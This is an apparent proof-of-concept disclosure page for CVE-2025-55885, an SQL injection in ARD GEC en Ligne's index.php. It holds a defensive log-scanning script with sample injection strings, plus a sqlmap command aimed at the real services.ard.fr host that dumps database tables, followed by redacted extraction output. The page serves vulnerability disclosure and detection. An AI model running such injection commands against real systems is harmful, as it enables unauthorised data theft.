CVE-2025-55885 PoC — ARD GEC en Ligne security vulnerability

Associated Vulnerability
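Title: ARD GEC en Ligne security vulnerability (CVE-2025-55885)
Description: ARD GEC en Ligne is an online service portal from the French company ARD. Versions of ARD GEC en Ligne before 2025-04-23 contain a security vulnerability that stems from improper handling of GET parameters in index.php and may lead to SQL injection attacks and privilege escalation.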
Readme
# CVE-2025-55885
### Description
SQL Injection vulnerability in Alpes Recherche et Developpement ARD GEC
en Ligne before v.2025-04-23 allows a remote attacker to escalate
privileges via the GET parameters in index.php.

### Attack Vectors
SQL injection via unsanitized GET parameter ocid on https://services.ard.fr/index.php (transaction confirmation page).
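
A defensive check for the attack vector above, as an added example that is not part of the original README or the vendor's code: it scans web-server access logs for requests to index.php whose `ocid` or `id` value is not a plain integer. The Combined Log Format, the assumption that both parameters are numeric (as in the request shown on this page), and the sample log lines are constructed for illustration.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qs

# Assumption: id and ocid are plain decimal integers, as in the request shown on this page.
NUMERIC_PARAMS = ("id", "ocid")
# Combined Log Format: ip - - [time] "METHOD target PROTO" status size "referer" "user-agent"
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (?P<target>\S+) [^"]*" (?P<status>\d{3}) \S+'
)

def suspicious_params(target):
    """Return {param: decoded value} for index.php numeric params that are not pure digits."""
    url = urlsplit(target)
    if not url.path.endswith("/index.php"):
        return {}
    query = parse_qs(url.query, keep_blank_values=True)  # percent-decodes the values
    bad = {}
    for name in NUMERIC_PARAMS:
        for value in query.get(name, []):
            if not re.fullmatch(r"[0-9]{1,10}", value):
                bad[name] = value
    return bad

def scan(lines):
    """Group flagged requests by client IP: {ip: [(param, value, status), ...]}."""
    hits = defaultdict(list)
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not an access-log line in the assumed format
        for name, value in suspicious_params(m["target"]).items():
            hits[m["ip"]].append((name, value, int(m["status"])))
    return dict(hits)

# Constructed sample log lines (documentation IP ranges, placeholder token), not real traffic.
SAMPLE_LOG = [
    '198.51.100.7 - - [01/May/2025:18:36:40 +0200] "GET /index.php?id=5869&ocid=183&token=PLACEHOLDER&transactionID=123 HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '203.0.113.9 - - [01/May/2025:18:36:46 +0200] "GET /index.php?id=5869&ocid=183%20AND%201%3D1&token=PLACEHOLDER&transactionID=123 HTTP/1.1" 200 5120 "-" "sqlmap/1.8"',
    '203.0.113.9 - - [01/May/2025:18:36:47 +0200] "GET /index.php?id=5869&ocid=183%27&token=PLACEHOLDER&transactionID=123 HTTP/1.1" 500 312 "-" "sqlmap/1.8"',
    '198.51.100.7 - - [01/May/2025:18:37:02 +0200] "GET /static/app.css HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for ip, events in scan(SAMPLE_LOG).items():
        print(ip, events)
```

The same digits-only rule, enforced server-side before the value reaches a parameterized query, is the corresponding input check on the application side.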

### Proof Of Concept
**Payload**
```
sqlmap -u "https://services.ard.fr/index.php?id=5869&ocid=183&token=1SemPugSUq3maSpK81871559797854161&transactionID=123" -p "ocid" --dbms=mysql -D ard -T [TABLE] --dump
```

**List of Tables**
```
[18:36:46] [INFO] retrieved: [redacted]
[18:37:15] [INFO] retrieved: [redacted]
[18:37:27] [INFO] retrieved: [redacted]
[18:37:39] [INFO] retrieved: [redacted]
[18:37:58] [INFO] retrieved: [redacted]
[18:38:15] [INFO] retrieved: [redacted]
[18:38:27] [INFO] retrieved: [redacted]
[18:38:59] [INFO] retrieved: [redacted]
[18:39:09] [INFO] retrieved: [redacted]
[18:39:30] [INFO] retrieved: [redacted]
[18:39:51] [INFO] retrieved: [redacted]
[18:40:03] [INFO] retrieved: [redacted]
[18:40:18] [INFO] retrieved: [redacted]
[18:40:35] [INFO] retrieved: [redacted]
[18:41:02] [INFO] retrieved: [redacted]
[18:41:48] [INFO] retrieved: [redacted]
[18:42:06] [INFO] retrieved: [redacted]
[18:42:23] [INFO] retrieved: [redacted]
[18:42:44] [INFO] retrieved: [redacted]
[18:43:04] [INFO] retrieved: [redacted]
[18:43:25] [INFO] retrieved: [redacted]
[18:44:01] [INFO] retrieved: [redacted]
[18:44:20] [INFO] retrieved: [redacted]
[18:44:40] [INFO] retrieved: [redacted]
[18:45:01] [INFO] retrieved: [redacted]
[18:45:13] [INFO] retrieved: [redacted]
[18:45:36] [INFO] retrieved: [redacted]
[18:45:54] [INFO] retrieved: [redacted]
[18:46:31] [INFO] retrieved: [redacted]
[18:46:56] [INFO] retrieved: [redacted]
[18:47:02] [INFO] retrieved: [redacted]
[18:47:13] [INFO] retrieved: [redacted]
[18:47:34] [INFO] retrieved: [redacted]
[18:47:58] [INFO] retrieved: [redacted]
[18:48:21] [INFO] retrieved: [redacted]
[19:45:51] [INFO] fetching entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] fetching number of entries for table '[user table]' in database 'ard'
[19:45:51] [INFO] retrieved: 3904699
```

### Researchers
- [raphckrman](https://github.com/raphckrman)